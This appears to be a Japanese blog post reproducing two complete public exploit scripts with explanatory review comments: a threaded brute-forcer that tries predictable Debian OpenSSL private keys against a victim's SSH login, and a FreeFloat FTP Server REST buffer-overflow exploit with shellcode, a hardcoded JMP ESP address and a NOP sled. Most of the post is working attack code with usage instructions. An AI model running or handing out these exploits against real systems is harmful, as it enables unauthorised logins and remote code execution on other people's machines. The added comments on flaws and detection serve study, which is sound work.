新しいソース

#!/bin/python
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#     - execute: python exploit.py (without parameters) to display the help
#     - if the key is found, the script shows something like that:
#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#         Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
 
 
import Queue
import os
import string
import time
from threading import Thread
import sys
 
#This class only has a boolean, which will be True if some thread find the key
class End():
    """Shared stop flag polled by every Connection worker and by the main loop.

    The flag starts cleared; Finish() sets it and nothing ever clears it again,
    so the first worker that succeeds stops all the others on their next check.
    """

    def __init__(self):
        # Cleared until some thread calls Finish().
        self.end = False

    def Finish(self):
        """Set the flag; idempotent, calling it twice changes nothing."""
        self.end = True

    def GetEnd(self):
        """Return True once Finish() has been called, False before."""
        return bool(self.end)
         
 
#This is the thread class
class Connection(Thread):
    """Worker thread: pops key file names from QueueDir and tries each one as an
    ssh identity against host, stopping when TheEnd is set or the queue is empty.

    Args:
        QueueDir: Queue.Queue of file names (relative to dir) to try.
        TheEnd:   shared End flag; Finish() is called on the first key that works.
        dir:      directory holding the key files (no trailing slash, per the usage text).
        host:     target host name or address handed to ssh.
        user:     login name handed to ssh -l.
        port:     ssh port, kept as a string because it is only ever concatenated.
    """
    def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port

    def run(self):
        # NOTE(review): empty() and get() are not atomic -- if another worker takes
        # the last item in between, Queue.get() (default block=True) never returns.
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()

            # The command is one shell string: user, port, dir, host and the file
            # name from os.listdir are all interpolated unquoted, so a name with
            # shell metacharacters is interpreted by the shell, not passed to ssh.
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            # Public-key auth only, so ssh never stops at a password prompt.
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            # 'exit' is the remote command; '; echo $?' runs in the *local* shell
            # after ssh returns, so stdout carries ssh's exit status.
            cmd = cmd + ' ' + self.host + ' exit; echo $?'

            # os.popen3 exists only in Python 2 (removed in 3); stdin is closed at once.
            pin,pout,perr = os.popen3(cmd, 'r')
            pin.close()

            #To debug descoment the next line. This will show the errors reported by ssh
            #print perr.read()

            # Only an exit status of exactly 0 counts as a hit; every other outcome
            # (unreachable host, rejected host key, wrong key) is silently treated as
            # "not this key", and stderr is never read. From the target's side each
            # iteration is one more failed publickey login in the sshd auth log.
            if pout.read().lstrip().rstrip() == '0':
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: '+ key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
                print ''
         
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

# Fewer than three positional arguments: print the help and exit with status 1.
if len(sys.argv) < 4:
    print './exploit.py <dir> <host> <user> [[port] [threads]]'
    print '    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
    print '    <host>: The victim host'
    print '    <user>: The user of the victim host'  
    print '    [port]: The SSH port of the victim host (default 22)'
    print '    [threads]: Number of threads (default 4) Too big numer is bad'

    sys.exit(1)

dir = sys.argv[1]    # shadows the builtin dir(); name is reused in the Connection(...) call below
host = sys.argv[2]
user = sys.argv[3]

# Optional arguments. port stays a string (it is only concatenated into the ssh
# command). threads is also a string when given on the command line and is only
# converted with int() at the thread-spawning loop, so a non-numeric value
# raises ValueError there, not here. Arguments beyond the fifth are ignored.
if len(sys.argv) <= 4:
      port='22'
      threads=4
else:
    if len(sys.argv) <=5:
        port=sys.argv[4]
        threads = 4

    else:
        port=sys.argv[4]   
        threads = sys.argv[5]

ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()

# Enqueue every directory entry whose name does not contain '.pub' anywhere.
# os.listdir also returns subdirectories and unrelated files; nothing here
# checks that an entry is actually a private key.
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:  
        QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

# Workers are started but never join()ed. They are non-daemon threads, so the
# interpreter still waits for them at exit; the final progress line below may
# therefore be printed before the last in-flight ssh attempts have finished.
for i in range(0,int(threads)):
    Connection(QueueDir,TheEnd,dir,host,user,port).start()


# Progress report every 5 s until a key is found or the queue is drained.
# All operands are ints, so under Python 2 the '/5' is integer division.
# 'tested' counts dequeued entries, not completed attempts: items a worker is
# currently trying are already off the queue.
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize)/5
    tested = initsize - actsize

    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
 
# milw0rm.com [2008-06-01]
||< 

これのソースが結構面白そうだから、
最初にどんなソースか読んでみようと思います。

>|python|
#!/usr/bin/python
#
#[+]Exploit Title: FreeFloat FTP Server REST and PASV Buffer Overflow Exploit
#[+]Date: 18\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#[+]Version: 1.00
#[+]Tested On: Windows XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
 
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
 
# Exactly two arguments (target ip and port) are required; otherwise print
# usage and exit with status 0.
if len(sys.argv) != 3:
    print "[-]Usage: python %s <ip> <port>" % sys.argv[0]
    print "[-]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])   # uncaught ValueError on a non-numeric port

# Payload bytes exactly as published; the inline notes are the author's.
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"#Shellcode WinExec CALC
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"#Known badchars "\x00\xff\x0d\x0a\x3d\x20"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca")
# Buffer layout: 246 filler bytes, a 4-byte little-endian address, a 20-byte
# NOP sled, then the payload -- roughly 400 bytes in total.
buf = "\x41" * 246
# NOTE(review): a single fixed absolute address only works while ntdll.dll loads
# at the same base as on the author's machine (header: XP SP3, Brazilian
# Portuguese); address-space randomization and a non-executable stack are the
# mitigations that break this style of payload.
buf += pack('<L',0x7C91FCD8)#JMP ESP in ntdll.dll
buf += "\x90" * 20
buf += shellcode

print "[+]Connecting with server..."
sleep(1)
# The whole exchange sits in one try block, and the bare except below catches
# everything (including KeyboardInterrupt and SystemExit), so any failure --
# not only connection errors -- produces the same message.
try:
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))
    s.recv(2000)    # server replies are read and discarded, never checked
    s.send("USER test\r\n")
    s.recv(2000)
    s.send("PASS test\r\n")
    s.recv(2000)
    # Detection note: a REST argument of several hundred bytes, mostly 0x41,
    # is far outside anything a legitimate FTP client sends.
    s.send("REST "+buf+"\r\n")
    s.close()
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))#Server needs connect AGAIN to CRASH and ocorrs the buffer overflow bug.
    sleep(1)#Wait a second
    s.close()#Close connection CRASH
    # Printed whenever the sends succeed; nothing here confirms the server crashed.
    print "[+]Exploit sent with sucess"
except:
    print "[*]Error in connection with server: "+ip

これもよさげ。